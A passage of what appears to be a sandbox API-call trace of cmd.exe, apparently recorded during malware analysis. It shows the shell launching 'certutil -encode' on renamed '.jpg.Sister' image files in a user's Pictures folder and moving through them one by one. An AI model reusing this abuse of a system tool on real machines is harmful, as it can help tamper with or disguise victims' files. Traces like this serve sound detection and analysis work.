_Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0298.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.901] GetFileType (hFile=0x50) returned 0x2 [0298.901] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.901] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0298.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.901] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0298.906] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0298.906] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0298.906] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0298.906] malloc (_Size=0xffce) returned 0x21eda100000 [0298.906] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0298.907] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0298.907] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0298.907] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0298.907] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0298.907] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0298.907] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0298.907] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0298.907] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0298.907] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0298.907] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0298.907] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0298.907] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0298.907] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0298.907] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0298.907] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0298.907] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0298.907] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0298.907] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0298.907] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0298.907] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0298.907] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0298.907] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0298.907] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0298.907] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0298.907] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0298.907] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0298.907] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0298.907] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0298.907] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0298.907] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0298.907] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0298.907] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0298.908] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0298.908] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0298.908] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0298.908] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0298.908] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0298.908] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0298.908] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0298.908] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0298.908] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0298.908] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0298.908] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0298.908] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0298.908] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0298.908] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0298.908] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0298.908] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0298.908] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0298.908] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0298.908] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0298.908] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0298.908] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0298.908] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0298.908] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0298.908] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0298.908] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0298.908] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0298.908] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0298.908] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0298.908] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0298.908] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0298.908] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0298.908] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0298.908] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0298.908] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0298.908] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0298.909] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0298.909] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0298.909] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0298.909] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0298.909] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0298.909] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0298.909] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0298.909] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0298.909] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0298.909] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0298.909] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0298.909] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0298.909] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0298.909] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0298.909] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0298.909] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0298.909] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0298.909] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0298.909] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0298.909] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0298.909] ??_V@YAXPEAX@Z () returned 0x1 [0298.909] GetProcessHeap () returned 0x21ed8c70000 [0298.909] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cd9820 [0298.909] GetProcessHeap () returned 0x21ed8c70000 [0298.909] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xba) returned 0x21ed8d6a960 [0298.909] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0298.909] malloc (_Size=0xffce) returned 0x21eda100000 [0298.909] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0298.910] GetProcessHeap () returned 0x21ed8c70000 [0298.910] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed8ce9810 [0298.911] SetErrorMode (uMode=0x0) returned 0x0 [0298.911] SetErrorMode (uMode=0x1) returned 0x0 [0298.911] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed8ce9820, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures", lpFilePart=0xa6cf4fdb80*="Pictures") returned 0x18 [0298.911] SetErrorMode (uMode=0x0) returned 0x1 [0298.911] GetProcessHeap () returned 0x21ed8c70000 [0298.911] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8ce9810, Size=0x54) returned 0x21ed8ce9810 [0298.911] GetProcessHeap () returned 0x21ed8c70000 [0298.911] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8ce9810) returned 0x54 [0298.911] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0298.911] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0298.911] GetProcessHeap () returned 0x21ed8c70000 [0298.911] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1be) returned 0x21ed8d65870 [0298.911] GetProcessHeap () returned 0x21ed8c70000 [0298.911] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36c) returned 0x21ed8d437f0 [0298.911] GetProcessHeap () returned 0x21ed8c70000 [0298.911] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d437f0, Size=0x1c0) returned 0x21ed8d654d0 [0298.911] GetProcessHeap () returned 0x21ed8c70000 [0298.911] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d654d0) returned 0x1c0 [0298.911] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0298.911] GetProcessHeap () returned 0x21ed8c70000 [0298.911] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c95e00 [0298.912] GetProcessHeap () returned 0x21ed8c70000 [0298.912] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95e00, Size=0x7e) returned 0x21ed8c95e00 [0298.912] GetProcessHeap () returned 0x21ed8c70000 [0298.912] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95e00) returned 0x7e [0298.912] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0298.912] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0298.912] GetLastError () returned 0x2 [0298.912] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0298.912] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0298.913] GetLastError () returned 0x2 [0298.913] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0298.913] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d000 [0298.913] FindClose (in: hFindFile=0x21ed8c7d000 | out: hFindFile=0x21ed8c7d000) returned 1 [0298.913] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0298.913] GetLastError () returned 0x2 [0298.913] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cca0 [0298.913] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0298.913] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0298.914] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0298.914] ??_V@YAXPEAX@Z () returned 0x1 [0298.914] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0298.914] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0298.915] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0298.915] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0298.915] GetProcessHeap () returned 0x21ed8c70000 [0298.915] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45bf0 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0298.915] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0298.916] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0298.916] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0298.916] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0298.916] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0298.916] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0298.916] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0298.916] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0298.916] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0298.916] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0298.916] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0298.916] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0298.916] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0298.916] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0298.916] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0298.916] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0298.916] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0298.916] GetProcessHeap () returned 0x21ed8c70000 [0298.916] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45bf0) returned 1 [0298.916] GetProcessHeap () returned 0x21ed8c70000 [0298.916] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95bc0 [0298.916] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0298.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.916] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0298.917] _get_osfhandle (_FileHandle=0) returned 0x4c [0298.917] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0298.917] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"hx6X83DtmMlRtgH7hUE7.jpg.Sister\" \"hx6X83DtmMlRtgH7hUE7.jpg.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Pictures", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"hx6X83DtmMlRtgH7hUE7.jpg.Sister\" \"hx6X83DtmMlRtgH7hUE7.jpg.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"hx6X83DtmMlRtgH7hUE7.jpg.Sister\" \"hx6X83DtmMlRtgH7hUE7.jpg.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x11d4, dwThreadId=0xf40)) returned 1 [0298.928] CloseHandle (hObject=0xa4) returned 1 [0298.928] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0298.928] GetProcessHeap () returned 0x21ed8c70000 [0298.928] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0298.928] GetEnvironmentStringsW () returned 0x21ed8cc7010* [0298.928] GetProcessHeap () returned 0x21ed8c70000 [0298.928] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8d603e0 [0298.929] FreeEnvironmentStringsA (penv="=") returned 1 [0298.929] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0299.255] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0299.256] CloseHandle (hObject=0xa8) returned 1 [0299.256] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0299.256] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0299.256] GetProcessHeap () returned 0x21ed8c70000 [0299.256] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0299.256] GetEnvironmentStringsW () returned 0x21ed8cc7010* [0299.256] GetProcessHeap () returned 0x21ed8c70000 [0299.256] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8d603e0 [0299.256] FreeEnvironmentStringsA (penv="=") returned 1 [0299.257] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0299.257] GetProcessHeap () returned 0x21ed8c70000 [0299.257] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0299.257] GetEnvironmentStringsW () returned 0x21ed8cc7010* [0299.257] GetProcessHeap () returned 0x21ed8c70000 [0299.257] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8d603e0 [0299.257] FreeEnvironmentStringsA (penv="=") returned 1 [0299.257] GetProcessHeap () returned 0x21ed8c70000 [0299.257] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95bc0) returned 1 [0299.257] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0299.257] ??_V@YAXPEAX@Z () returned 0x1 [0299.257] FindNextFileW (in: hFindFile=0x21ed8c7cbe0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1aaac0, ftCreationTime.dwHighDateTime=0x1d5e299, ftLastAccessTime.dwLowDateTime=0xdec32e50, ftLastAccessTime.dwHighDateTime=0x1d5e94b, ftLastWriteTime.dwLowDateTime=0xdec32e50, ftLastWriteTime.dwHighDateTime=0x1d5e94b, nFileSizeHigh=0x0, nFileSizeLow=0xeb27, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="k8h31.jpg.Sister", cAlternateFileName="")) returned 1 [0299.257] GetProcessHeap () returned 0x21ed8c70000 [0299.257] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95c40, Size=0x1c6) returned 0x21ed8c758a0 [0299.257] GetProcessHeap () returned 0x21ed8c70000 [0299.257] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x1c6 [0299.257] GetProcessHeap () returned 0x21ed8c70000 [0299.257] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b0660 [0299.258] GetProcessHeap () returned 0x21ed8c70000 [0299.258] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0660, Size=0x58) returned 0x21ed93b0660 [0299.258] GetProcessHeap () returned 0x21ed8c70000 [0299.258] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0660) returned 0x58 [0299.258] GetProcessHeap () returned 0x21ed8c70000 [0299.258] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b06d0 [0299.258] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0299.258] GetProcessHeap () returned 0x21ed8c70000 [0299.258] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed8cc8950 [0299.258] ??_V@YAXPEAX@Z () returned 0x1 [0299.258] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0299.258] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cb20 [0299.258] FindClose (in: hFindFile=0x21ed8c7cb20 | out: hFindFile=0x21ed8c7cb20) returned 1 [0299.259] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cfa0 [0299.259] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0299.259] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xdcf20441, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdcf20441, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7cac0 [0299.259] FindClose (in: hFindFile=0x21ed8c7cac0 | out: hFindFile=0x21ed8c7cac0) returned 1 [0299.259] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\k8h31.jpg.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1aaac0, ftCreationTime.dwHighDateTime=0x1d5e299, ftLastAccessTime.dwLowDateTime=0xdec32e50, ftLastAccessTime.dwHighDateTime=0x1d5e94b, ftLastWriteTime.dwLowDateTime=0xdec32e50, ftLastWriteTime.dwHighDateTime=0x1d5e94b, nFileSizeHigh=0x0, nFileSizeLow=0xeb27, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="k8h31.jpg.Sister", cAlternateFileName="K8H31J~1.SIS")) returned 0x21ed8c7ca60 [0299.260] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0299.260] _wcsnicmp (_String1="K8H31J~1.SIS", _String2="k8h31.jpg.Sister", _MaxCount=0x10) returned 60 [0299.260] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0299.260] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0299.260] GetProcessHeap () returned 0x21ed8c70000 [0299.260] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 